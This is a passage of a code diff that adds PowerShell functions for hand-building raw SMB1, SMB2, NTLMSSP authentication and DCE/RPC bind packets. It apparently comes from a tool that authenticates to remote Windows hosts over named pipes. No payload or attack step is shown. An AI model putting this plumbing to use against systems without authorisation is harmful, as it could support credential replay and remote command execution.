+ [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+ [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
+ $packet_file_name_length = $packet_file_name_length[0,1]
+
+ $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNTCreateAndXRequest.Add("WordCount",[Byte[]](0x18))
+ $packet_SMBNTCreateAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved2",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileNameLen",$packet_file_name_length)
+ $packet_SMBNTCreateAndXRequest.Add("CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("RootFID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $packet_SMBNTCreateAndXRequest.Add("AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Disposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SecurityFlags",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ByteCount",$packet_named_pipe_length)
+ $packet_SMBNTCreateAndXRequest.Add("Filename",$packet_named_pipe)
+
+ return $packet_SMBNTCreateAndXRequest
+}
+
+function New-PacketSMBReadAndXRequest
+{
+ $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBReadAndXRequest.Add("WordCount",[Byte[]](0x0a))
+ $packet_SMBReadAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBReadAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBReadAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("FID",[Byte[]](0x00,0x40))
+ $packet_SMBReadAndXRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("MaxCountLow",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("MinCount",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("Unknown",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBReadAndXRequest.Add("Remaining",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBReadAndXRequest
+}
+
+function New-PacketSMBWriteAndXRequest
+{
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+ $packet_write_length = $packet_write_length[0,1]
+
+ $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBWriteAndXRequest.Add("WordCount",[Byte[]](0x0e))
+ $packet_SMBWriteAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBWriteAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBWriteAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("FID",$packet_file_ID)
+ $packet_SMBWriteAndXRequest.Add("Offset",[Byte[]](0xea,0x03,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBWriteAndXRequest.Add("WriteMode",[Byte[]](0x08,0x00))
+ $packet_SMBWriteAndXRequest.Add("Remaining",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataLengthHigh",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("DataLengthLow",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataOffset",[Byte[]](0x3f,0x00))
+ $packet_SMBWriteAndXRequest.Add("HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("ByteCount",$packet_write_length)
+
+ return $packet_SMBWriteAndXRequest
+}
+
+function New-PacketSMBCloseRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBCloseRequest.Add("WordCount",[Byte[]](0x03))
+ $packet_SMBCloseRequest.Add("FID",$packet_file_ID)
+ $packet_SMBCloseRequest.Add("LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBCloseRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBCloseRequest
+}
+
+function New-PacketSMBTreeDisconnectRequest
+{
+ $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeDisconnectRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBTreeDisconnectRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBTreeDisconnectRequest
+}
+
+function New-PacketSMBLogoffAndXRequest
+{
+ $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBLogoffAndXRequest.Add("WordCount",[Byte[]](0x02))
+ $packet_SMBLogoffAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBLogoffAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBLogoffAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBLogoffAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBLogoffAndXRequest
+}
+
+#SMB2
+
+function New-PacketSMB2Header
+{
+ param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+}
+
+function New-PacketSMB2NegotiateProtocolRequest
+{
+ $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02))
+
+ return $packet_SMB2NegotiateProtocolRequest
+}
+
+function New-PacketSMB2SessionSetupRequest
+{
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01))
+ $packet_SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferLength",$packet_security_blob_length)
+ $packet_SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Buffer",$packet_security_blob)
+
+ return $packet_SMB2SessionSetupRequest
+}
+
+function New-PacketSMB2TreeConnectRequest
+{
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00))
+ $packet_SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathLength",$packet_path_length)
+ $packet_SMB2TreeConnectRequest.Add("Buffer",$packet_path)
+
+ return $packet_SMB2TreeConnectRequest
+}
+
+function New-PacketSMB2CreateRequestFile
+{
+ param([Byte[]]$packet_named_pipe)
+
+ $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+
+ $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CreateRequestFile.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2CreateRequestFile.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("RequestedOplockLevel",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameOffset",[Byte[]](0x78,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameLength",$packet_named_pipe_length)
+ $packet_SMB2CreateRequestFile.Add("CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Buffer",$packet_named_pipe)
+
+ return $packet_SMB2CreateRequestFile
+}
+
+function New-PacketSMB2ReadRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2ReadRequest.Add("Padding",[Byte[]](0x50))
+ $packet_SMB2ReadRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2ReadRequest.Add("Length",[Byte[]](0x00,0x00,0x10,0x00))
+ $packet_SMB2ReadRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Buffer",[Byte[]](0x30))
+
+ return $packet_SMB2ReadRequest
+}
+
+function New-PacketSMB2WriteRequest
+{
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+
+ $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00))
+ $packet_SMB2WriteRequest.Add("Length",$packet_write_length)
+ $packet_SMB2WriteRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2WriteRequest
+}
+
+function New-PacketSMB2CloseRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00))
+ $packet_SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CloseRequest.Add("FileID",$packet_file_ID)
+
+ return $packet_SMB2CloseRequest
+}
+
+function New-PacketSMB2TreeDisconnectRequest
+{
+ $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2TreeDisconnectRequest
+}
+
+function New-PacketSMB2SessionLogoffRequest
+{
+ $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2SessionLogoffRequest
+}
+
+#NTLM
+
+function New-PacketNTLMSSPNegotiate
+{
+ param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
+ [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
+ [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
+ [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
+ [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
+
+ $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60))
+ $packet_NTLMSSPNegotiate.Add("InitialcontextTokenLength",$packet_ASN_length_1)
+ $packet_NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength",$packet_ASN_length_2)
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength2",$packet_ASN_length_3)
+ $packet_NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2))
+ $packet_NTLMSSPNegotiate.Add("MechTokenLength",$packet_ASN_length_4)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NegotiateFlags",$packet_negotiate_flags)
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_version)
+ {
+ $packet_NTLMSSPNegotiate.Add("Version",$packet_version)
+ }
+
+ return $packet_NTLMSSPNegotiate
+}
+
+function New-PacketNTLMSSPAuth
+{
+ param([Byte[]]$packet_NTLM_response)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
+ [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
+ $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
+ [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
+ $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
+ [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
+ $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
+
+ $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength",$packet_ASN_length_1)
+ $packet_NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength2",$packet_ASN_length_2)
+ $packet_NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength3",$packet_ASN_length_3)
+ $packet_NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPAuth.Add("NTLMResponse",$packet_NTLM_response)
+
+ return $packet_NTLMSSPAuth
+}
+
+#RPC
+
+function New-PacketRPCBind
+{
+ param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
+
+ [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
+
+ $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCBind.Add("Version",[Byte[]](0x05))
+ $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCBind.Add("PacketType",[Byte[]](0x0b))
+ $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03))
+ $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00))
+ $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("CallID",$packet_call_ID_bytes)
+ $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items)
+ $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID",$packet_context_ID)
+ $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown2",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface",$packet_UUID)
+ $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version)
+ $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
+ $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
+
+ if($packet_num_ctx_items[0] -eq 2)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ }
+ elseif($packet_num_ctx_items[0] -eq 3)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00))
+ $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown4",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ if($packet_call_ID -eq 3)
+ {
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ return $packet_RPCBind
+}
+
+function New-PacketRPCRequest
+{
+ param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data)
+
+ if($packet_auth_length -gt 0)
+ {
+ $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
+ }
+
